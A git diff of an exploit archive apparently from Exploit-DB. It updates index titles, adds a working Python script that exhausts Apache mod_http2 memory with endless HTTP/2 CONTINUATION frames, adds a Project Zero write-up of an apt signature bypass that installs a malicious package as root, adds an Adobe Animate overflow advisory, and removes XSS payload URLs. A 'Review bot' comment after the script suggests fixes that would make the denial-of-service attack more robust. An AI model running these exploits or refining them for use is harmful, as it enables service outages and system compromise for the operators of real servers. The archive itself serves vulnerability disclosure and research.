@@ -26515,7 +26517,7 @@ id,file,description,date,author,platform,type,port 23637,platforms/php/webapps/23637.txt,"Qualiteam X-Cart 3.x - upgrade.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 23639,platforms/php/webapps/23639.txt,"Qualiteam X-Cart 3.x - Multiple Remote Information Disclosure Vulnerabilities",2004-02-03,Philip,php,webapps,0 23640,platforms/php/webapps/23640.txt,"phpMyAdmin 2.x - Export.php File Disclosure",2004-02-03,"Cedric Cochin",php,webapps,0 -23644,platforms/php/webapps/23644.php,"phpx 3.2.3 - Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",php,webapps,0 +23644,platforms/php/webapps/23644.php,"PHPX 3.2.3 - Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",php,webapps,0 23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - showproduct.php SQL Injection",2004-02-04,G00db0y,php,webapps,0 23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - showcat.php SQL Injection",2004-02-04,G00db0y,php,webapps,0 23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps,0 
@@ -26736,11 +26738,11 @@ id,file,description,date,author,platform,type,port 24083,platforms/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps,0 24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - (go Parameter) Open Redirect",2013-01-13,LiquidWorm,php,webapps,0 24087,platforms/php/webapps/24087.txt,"phlyLabs phlyMail Lite 4.03.04 - Full Path Disclosure / Persistent Cross-Site Scripting",2013-01-13,LiquidWorm,php,webapps,0 -24088,platforms/php/webapps/24088.txt,"PHPX 3.x - admin/page.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 -24089,platforms/php/webapps/24089.txt,"PHPX 3.x - admin/news.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 -24090,platforms/php/webapps/24090.txt,"PHPX 3.x - admin/user.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 -24091,platforms/php/webapps/24091.txt,"PHPX 3.x - admin/images.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 -24092,platforms/php/webapps/24092.txt,"PHPX 3.x - admin/forums.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24088,platforms/php/webapps/24088.txt,"PHPX 3.x - 'page.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24089,platforms/php/webapps/24089.txt,"PHPX 3.x - 'news.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24090,platforms/php/webapps/24090.txt,"PHPX 3.x - 'user.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24091,platforms/php/webapps/24091.txt,"PHPX 3.x - 'images.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24092,platforms/php/webapps/24092.txt,"PHPX 3.x - 'forums.php' Cross-Site Request Forgery / Arbitrary 
Command Execution",2004-05-05,JeiAr,php,webapps,0 24094,platforms/cgi/webapps/24094.txt,"SurgeLDAP 1.0 - Web Administration Authentication Bypass",2004-05-05,"GSS IT",cgi,webapps,0 24099,platforms/php/webapps/24099.txt,"Adam Webb NukeJokes 1.7/2.0 Module - Multiple Parameter Cross-Site Scripting",2004-05-08,"Janek Vind",php,webapps,0 24100,platforms/php/webapps/24100.txt,"Adam Webb NukeJokes 1.7/2.0 Module - modules.php jokeid Parameter SQL Injection",2004-05-08,"Janek Vind",php,webapps,0 @@ -29672,7 +29674,7 @@ id,file,description,date,author,platform,type,port 28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 -28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 +28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - 'MyajaxPHP.php' Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0 28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusion",2006-08-29,sCORPINo,php,webapps,0 
@@ -30639,9 +30641,9 @@ id,file,description,date,author,platform,type,port 29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - register.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80 30368,platforms/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - admin/edituser.php userid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 -30369,platforms/php/webapps/30369.txt,"Alstrasoft Affiliate Network Pro 8.0 - merchants/index.php Multiple Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 -30370,platforms/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - merchants/temp.php rowid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 -30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - merchants/index.php uploadProducts Action pgmid Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0 +30369,platforms/php/webapps/30369.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'index.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 +30370,platforms/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 +30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0 29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0 29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0 29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti - Goster.asp SQL Injection",2007-03-09,Cr@zy_King,asp,webapps,0 
@@ -30662,11 +30664,11 @@ id,file,description,date,author,platform,type,port 29751,platforms/php/webapps/29751.php,"phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0 29754,platforms/php/webapps/29754.html,"WordPress 2.x - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 29755,platforms/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,php,webapps,0 -29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - print.php news_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - forums.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29758,platforms/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 - users.php user_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29759,platforms/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 - news.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 - gallery.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 +29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - 'print.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 +29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - 'forums.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 +29758,platforms/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 - 'users.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 +29759,platforms/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 - 'news.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 +29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 - 'gallery.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - Login Parameter Local File Inclusion / Authentication Bypass 
Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0 29762,platforms/php/webapps/29762.txt,"Web Wiz Forums 8.05 - String Filtering SQL Injection",2007-03-20,"Ivan Fratric",php,webapps,0 29763,platforms/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",php,webapps,0 
@@ -32268,14 +32270,14 @@ id,file,description,date,author,platform,type,port 32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting",2008-09-03,C1c4Tr1Z,php,webapps,0 32318,platforms/php/webapps/32318.txt,"XRms 1.99.2 - 'login.php' target Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 32319,platforms/php/webapps/32319.txt,"OpenSupports 2.x - Authentication Bypass / Cross-Site Request Forgery",2014-03-17,"TN CYB3R",php,webapps,0 -32320,platforms/php/webapps/32320.txt,"XRms 1.99.2 - activities/some.php title Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32321,platforms/php/webapps/32321.txt,"XRms 1.99.2 - companies/some.php company_name Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32322,platforms/php/webapps/32322.txt,"XRms 1.99.2 - contacts/some.php last_name Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32323,platforms/php/webapps/32323.txt,"XRms 1.99.2 - campaigns/some.php campaign_title Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32324,platforms/php/webapps/32324.txt,"XRms 1.99.2 - opportunities/some.php opportunity_title Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32325,platforms/php/webapps/32325.txt,"XRms 1.99.2 - cases/some.php case_title Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32326,platforms/php/webapps/32326.txt,"XRms 1.99.2 - files/some.php file_id Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32327,platforms/php/webapps/32327.txt,"XRms 1.99.2 - reports/custom/mileage.php starting Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32320,platforms/php/webapps/32320.txt,"XRms 1.99.2 - 'title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32321,platforms/php/webapps/32321.txt,"XRms 1.99.2 - 'company_name' 
Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32322,platforms/php/webapps/32322.txt,"XRms 1.99.2 - 'last_name' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32323,platforms/php/webapps/32323.txt,"XRms 1.99.2 - 'campaign_title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32324,platforms/php/webapps/32324.txt,"XRms 1.99.2 - 'opportunity_title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32325,platforms/php/webapps/32325.txt,"XRms 1.99.2 - 'case_title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32326,platforms/php/webapps/32326.txt,"XRms 1.99.2 - 'file_id' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32327,platforms/php/webapps/32327.txt,"XRms 1.99.2 - 'starting' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 32330,platforms/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps,0 32331,platforms/php/webapps/32331.txt,"Joomla! Component AJAX Shoutbox 1.6 - SQL Injection",2014-03-17,"Ibrahim Raafat",php,webapps,0 32334,platforms/php/webapps/32334.txt,"CeleronDude Uploader 6.1 - 'account.php' Cross-Site Scripting",2008-09-03,Xc0re,php,webapps,0 
@@ -33310,7 +33312,6 @@ id,file,description,date,author,platform,type,port 34265,platforms/php/webapps/34265.txt,"Exponent CMS 0.97 - 'Slideshow.js.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 34266,platforms/php/webapps/34266.txt,"RunCMS 2.1 - 'check.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 34268,platforms/php/webapps/34268.txt,"Worxware DCP-Portal 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 -34269,platforms/php/webapps/34269.txt,"Pligg 1.0.4 - 'install1.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 34273,platforms/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,php,webapps,80 34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80 34277,platforms/php/webapps/34277.txt,"Feng Office - Persistent Cross-Site Scripting",2014-08-06,"Juan Sacco",php,webapps,0 @@ -36873,4 +36874,4 @@ id,file,description,date,author,platform,type,port 40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0 40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0 40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80 -40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' SQL Injection",2016-12-13,"Elar Lang",php,webapps,80 +40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' Parameter SQL Injection",2016-12-13,"Elar Lang",php,webapps,80 diff --git a/platforms/linux/dos/40909.py b/platforms/linux/dos/40909.py new file mode 100755 index 000000000..c5c2498a7 --- /dev/null +++ b/platforms/linux/dos/40909.py 
@@ -0,0 +1,45 @@ +#!/usr/bin/python + +""" source : http://seclists.org/bugtraq/2016/Dec/3 +The mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 request.(https://access.redhat.com/security/cve/cve-2016-8740) + +Usage : cve-2016-8740.py [HOST] [PORT] +""" + +import sys +import struct +import socket + +HOST = sys.argv[1] +PORT = int(sys.argv[2]) + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((HOST, PORT)) + +# https://http2.github.io/http2-spec/#ConnectionHeader +s.sendall('PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n') + +# https://http2.github.io/http2-spec/#SETTINGS +SETTINGS = struct.pack('3B', 0x00, 0x00, 0x00) # Length +SETTINGS += struct.pack('B', 0x04) # Type +SETTINGS += struct.pack('B', 0x00) +SETTINGS += struct.pack('>I', 0x00000000) +s.sendall(SETTINGS) + +# https://http2.github.io/http2-spec/#HEADERS +HEADER_BLOCK_FRAME = '\x82\x84\x86\x41\x86\xa0\xe4\x1d\x13\x9d\x09\x7a\x88\x25\xb6\x50\xc3\xab\xb6\x15\xc1\x53\x03\x2a\x2f\x2a\x40\x83\x18\xc6\x3f\x04\x76\x76\x76\x76' +HEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length +HEADERS += struct.pack('B', 0x01) # Type +HEADERS += struct.pack('B', 0x00) # Flags +HEADERS += struct.pack('>I', 0x00000001) # Stream ID +s.sendall(HEADERS + HEADER_BLOCK_FRAME) + +# Sending CONTINUATION frames for leaking memory +# https://http2.github.io/http2-spec/#CONTINUATION +while True: + HEADER_BLOCK_FRAME = '\x40\x83\x18\xc6\x3f\x04\x76\x76\x76\x76' + HEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length + HEADERS += struct.pack('B', 0x09) # Type + HEADERS += struct.pack('B', 0x01) # Flags + HEADERS += struct.pack('>I', 0x00000001) # Stream ID + s.sendall(HEADERS + HEADER_BLOCK_FRAME) 
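Review bot: in the `while True` loop at the end of the hunk the CONTINUATION frames are built with `struct.pack('B', 0x01)  # Flags`, but `0x01` is not a defined flag for frame type `0x09`; the only flag CONTINUATION carries is END_HEADERS (`0x4`), and it is the absence of END_HEADERS that keeps mod_http2 accumulating the header block, so either send `0x00` or change the comment to say that END_HEADERS is deliberately never set. Three smaller points: the payloads handed to `sendall` (`'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'` and the `'\x82\x84\x86...'` header block) are `str` literals, so this runs only under Python 2 although the shebang is the unversioned `#!/usr/bin/python`; `sys.argv[1]`/`sys.argv[2]` are read without a length check and the loop has no `socket.error` handling, so a missing argument or the server closing the connection ends in a traceback rather than a message; and with a plain `socket.socket` and no `ssl`/ALPN negotiation the script can only reach an `h2c` (cleartext) listener, even though the quoted CVE text covers both `h2` and `h2c`, which the `Usage :` line should say. The docstring also calls the script `cve-2016-8740.py` while the file is `40909.py`.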
diff --git a/platforms/linux/remote/40916.txt b/platforms/linux/remote/40916.txt new file mode 100755 index 000000000..c212ab09c --- /dev/null +++ b/platforms/linux/remote/40916.txt 
@@ -0,0 +1,184 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1020 + +== Vulnerability == +When apt-get updates a repository that uses an InRelease file (clearsigned +Release files), this file is processed as follows: +First, the InRelease file is downloaded to disk. +In a subprocess running the gpgv helper, "apt-key verify" (with some more +arguments) is executed through the following callchain: + +gpgv.cc:main -> pkgAcqMethod::Run -> GPGVMethod::URIAcquire + -> GPGVMethod::VerifyGetSigners -> ExecGPGV + +ExecGPGV() splits the clearsigned file into payload and signature using +SplitClearSignedFile(), calls apt-key on these two files to perform the +cryptographic signature verification, then discards the split files and only +retains the clearsigned original. SplitClearSignedFile() ignores leading and +trailing garbage. + +Afterwards, in the parent process, the InRelease file has to be loaded again +so that its payload can be processed. At this point, the code +isn't aware anymore whether the Release file was clearsigned or +split-signed, so the file is opened using OpenMaybeClearSignedFile(), which +first attempts to parse the file as a clearsigned (InRelease) file and extract +the payload, then falls back to treating the file as the file as a split-signed +(Release) file if the file format couldn't be recognized. + +The weakness here is: If an attacker can create an InRelease file that +is parsed as a proper split-signed file during signature validation, but then +isn't recognized by OpenMaybeClearSignedFile(), the "leading garbage" that was +ignored by the signature validation is interpreted as repository metadata, +bypassing the signing scheme. + +It first looks as if it would be impossible to create a file that is recognized +as split-signed by ExecGPGV(), but isn't recognized by +OpenMaybeClearSignedFile(), because both use the same function, +SplitClearSignedFile(), for parsing the file. 
However, multiple executions of +SplitClearSignedFile() on the same data can actually have different non-error +results because of a bug. +SplitClearSignedFile() uses getline() to parse the input file. A return code +of -1, which signals that either EOF or an error occured, is always treated +as EOF. The Linux manpage only lists EINVAL (caused by bad arguments) as +possible error code, but because the function allocates (nearly) unbounded +amounts of memory, it can actually also fail with ENOMEM if it runs out of +memory. +Therefore, if an attacker can cause the address space in the main apt-get +process to be sufficiently constrained to prevent allocation of a large line +buffer while the address space of the gpgv helper process is less constrained +and permits the allocation of a buffer with the same size, the attacker can use +this to fake an end-of-file condition in SplitClearSignedFile() that causes the +file to be parsed as a normal Release file. + +A very crude way to cause such a constraint on a 32-bit machine is based on +abusing ASLR. Because ASLR randomizes the address space after each execve(), +thereby altering how much contiguous virtual memory is available, an allocation +that attempts to use the average available virtual memory should ideally succeed +50% of the time, resulting in an upper limit of 25% for the success rate of the +whole attack. (That's not very effective, and a real attacker would likely want +a much higher success rate, but it works for a proof of concept.) +This is not necessarily a limitation of the vulnerability, just a limitation +of the way the exploit is designed. + +I think that it would make sense to fix this as follows: + - Set errno to 0 before calling getline(), verify that it's still 0 after + returning -1, treat it as an error if errno isn't 0 anymore. + - Consider splitting the InRelease file only once, before signature validation, + and then deleting the original clearsigned file instead of the payload file. 
+ This would get rid of the weakness that the file is parsed twice and parsing + differences can have security consequences, which is a pretty brittle design. + - I'm not sure whether this bug would have been exploitable if the parser for + split files or the parser for Release files had been stricter. You might want + to consider whether you could harden this code that way. + + + +== Reproduction instructions == +These steps are probably more detailed than necessary. + +First, prepare a clean Debian VM for the victim: + + - download debian-8.6.0-i386-netinst.iso (it is important that this + is i386 and not amd64) + - install Virtualbox (I'm using version 4.6.36 from Ubuntu) + - create a new VM with the following properties: + - type "Linux", version "Debian (32-bit)" + - 8192 MB RAM (this probably doesn't matter much, especially + if you enable swap) + - create a new virtual harddrive, size 20GB (also doesn't matter much) + - launch the VM, insert the CD + - pick graphical install + - in the installer, use defaults everywhere, apart from enabling Xfce + in the software selection + +After installation has finished, log in, launch a terminal, +"sudo nano /etc/apt/sources.list", change the "deb" line for jessie-updates +so that it points to some unused port on the host machine instead of +the proper mirror +("deb http://192.168.0.2:1337/debian/ jessie-updates main" or so). +This simulates a MITM attack or compromised mirror. 
+ +On the host (as the attacker): + + +$ tar xvf apt_sig_bypass.tar +apt_sig_bypass/ +apt_sig_bypass/debian/ +apt_sig_bypass/debian/netcat-evil.deb +apt_sig_bypass/debian/dists/ +apt_sig_bypass/debian/dists/jessie-updates/ +apt_sig_bypass/debian/dists/jessie-updates/InRelease.part1 +apt_sig_bypass/debian/dists/jessie-updates/main/ +apt_sig_bypass/debian/dists/jessie-updates/main/binary-i386/ +apt_sig_bypass/debian/dists/jessie-updates/main/binary-i386/Packages +apt_sig_bypass/make_inrelease.py +$ cd apt_sig_bypass/ +$ curl --output debian/dists/jessie-updates/InRelease.part2 http://ftp.us.debian.org/debian/dists/jessie-updates/InRelease + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed +100 141k 100 141k 0 0 243k 0 --:--:-- --:--:-- --:--:-- 243k +$ ./make_inrelease.py +$ ls -lh debian/dists/jessie-updates/InRelease +-rw-r--r-- 1 user user 1.3G Dec 5 17:13 debian/dists/jessie-updates/InRelease +$ python -m SimpleHTTPServer 1337 . +Serving HTTP on 0.0.0.0 port 1337 ... + + +Now, in the VM, as root, run "apt-get update". +It will probably fail - run it again until it doesn't fail anymore. +The errors that can occur are "Clearsigned file isn't valid" (when the +allocation during gpg verification fails) and some message about +a hash mismatch (when both allocations succeed). After "apt-get update" +has succeeded, run "apt-get upgrade" and confirm the upgrade. The result should +look like this (server IP censored, irrelevant output removed and marked with +"[...]"): + +root@debian:/home/user# apt-get update +Get:1 http://{{{SERVERIP}}}:1337 jessie-updates InRelease [1,342 MB] +[...] +Hit http://ftp.us.debian.org jessie-updates InRelease +[...] 
+100% [1 InRelease gpgv 1,342 MB] 28.6 MB/s 0sSplitting up /var/lib/apt/lists/partial/{{{SERVERIP}}}:1337_debian_dists_jessie-updates_InRelease intIgn http://{{{SERVERIP}}}:1337 jessie-updates InRelease +E: GPG error: http://{{{SERVERIP}}}:1337 jessie-updates InRelease: Clearsigned file isn't valid, got 'NODATA' (does the network require authentication?) + +root@debian:/home/user# apt-get update +[...] +Get:1 http://{{{SERVERIP}}}:1337 jessie-updates InRelease [1,342 MB] +[...] +Hit http://ftp.us.debian.org jessie-updates InRelease +Get:4 http://{{{SERVERIP}}}:1337 jessie-updates/main i386 Packages [170 B] +[...] +Fetched 1,349 MB in 55s (24.4 MB/s) +Reading package lists... Done + +root@debian:/home/user# apt-get upgrade +Reading package lists... Done +Building dependency tree +Reading state information... Done +Calculating upgrade... Done +The following packages will be upgraded: + netcat-traditional +1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. +Need to get 666 B of archives. +After this operation, 109 kB disk space will be freed. +Do you want to continue? [Y/n] +Get:1 http://{{{SERVERIP}}}:1337/debian/ jessie-updates/main netcat-traditional i386 9000 [666 B] +Fetched 666 B in 0s (0 B/s) +Reading changelogs... Done +dpkg: warning: parsing file '/var/lib/dpkg/tmp.ci/control' near line 5 package 'netcat-traditional': + missing description +dpkg: warning: parsing file '/var/lib/dpkg/tmp.ci/control' near line 5 package 'netcat-traditional': + missing maintainer +(Reading database ... 86469 files and directories currently installed.) +Preparing to unpack .../netcat-traditional_9000_i386.deb ... +arbitrary code execution reached +uid=0(root) gid=0(root) groups=0(root) +[...] + +As you can see, if the attacker gets lucky with the ASLR randomization, there +are no security warnings and "apt-get upgrade" simply installs the malicious +version of the package. 
(The dpkg warnings are just because I created a minimal +package file, without some of the usual information.) + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40916.zip diff --git a/platforms/php/webapps/22384.txt b/platforms/php/webapps/22384.txt deleted file mode 100755 index 68ac9cfab..000000000 --- a/platforms/php/webapps/22384.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/7140/info - -It has been reported that Siteframe does not sufficiently filter user supplied URI parameters on Siteframe pages. - -As a result of this deficiency, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. All code will be executed within the context of the website running Siteframe. - -This may allow for theft of cookie-based authentication credentials and other attacks. - -This vulnerability was reported to affect Siteframe version 2.2.4, it is not currently known if other versions are affected. - -http://www.example.com/search.php?searchfor="> \ No newline at end of file diff --git a/platforms/php/webapps/34269.txt b/platforms/php/webapps/34269.txt deleted file mode 100755 index 97be1d203..000000000 --- a/platforms/php/webapps/34269.txt +++ /dev/null 
@@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/41456/info - -Pligg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. - -Pligg 1.0.4 is vulnerable; other versions may also be affected. - -http://www.example.com/install/install1.php?language=%22%20onmouseover=alert()%3E -http://www.example.com/install/install1.php?language=%22%20style=a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;%20onmouseover=alert%28String.fromCharCode%2888,83,83%29%29;%3E - diff --git a/platforms/php/webapps/5975.txt b/platforms/php/webapps/5975.txt index afff37e68..78a9e4dfa 100755 --- a/platforms/php/webapps/5975.txt +++ b/platforms/php/webapps/5975.txt @@ -86,12 +86,12 @@ REPLY: Category : +href="?mode=viewcat&cat_id=1"> [SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN PASSWORD] Posted By : 1 | -Comments[1] | +Comments[1] | SQL Injection Vulnerability 2: @@ -105,7 +105,7 @@ http://somedomain.com/file.html: http://[TARGET]/[MYBLOGGIE-DIRECTORY]/admin.php?mode=edit" method="POST"> diff --git a/platforms/windows/dos/40915.txt b/platforms/windows/dos/40915.txt new file mode 100755 index 000000000..f74da88c0 --- /dev/null +++ b/platforms/windows/dos/40915.txt 
@@ -0,0 +1,133 @@ +[+] Credits: John Page aka hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/ADOBE-ANIMATE-MEMORY-CORRUPTION-VULNERABILITY.txt + +[+] ISR: ApparitionSec + + + +Vendor: +============= +www.adobe.com + + + +Product(s): +============================= +Adobe Animate +15.2.1.95 and earlier versions + +Adobe Animate (formerly Adobe Flash Professional, Macromedia Flash, and +FutureSplash Animator) is a multimedia authoring and computer +animation program developed by Adobe Systems. + + + +Platforms: +=================== +Windows / Macintosh + + + +Vulnerability Type: +======================================= +Critical Memory Corruption Vulnerability + + + +CVE Reference: +============== +CVE-2016-7866 +APSB16-38 + + + +Vulnerability Details: +===================== +Adobe Animate suffers from a Buffer Overflow when creating .FLA files with +ActionScript Classes that use overly long Class names. +This causes memory corruption leading to possible arbitrary code execution +upon opening a maliciously created .Fla Flash file. + + +Reproduction / POC: + + +1) Create FLA with overly long Class name in FLA Class publish properties +input field. +2) Save and close +3) Reopen FLA, click edit to open the .as script file +4) "ctrl + s" to save then boom.... access violation + + +Distributed: +Create new ".as" ActionScript 3 (AS3) file and give it very long class name +in input field then hit "Ctrl+s" to save.. +you will crash IDE, next way described is ONE way how attackers can +distribute malicious .FLA + +Abusing JSFL, The Flash JavaScript application programming interface +(JavaScript API or JSAPI). + +1) Create following .JSFL file + +fl.getDocumentDOM().save(); +fl.getDocumentDOM().testMovie(); + +2) Create a MovieClip stored in FLA library with a very long class name +that extends MovieClip and export + it for ActionScript etc... 
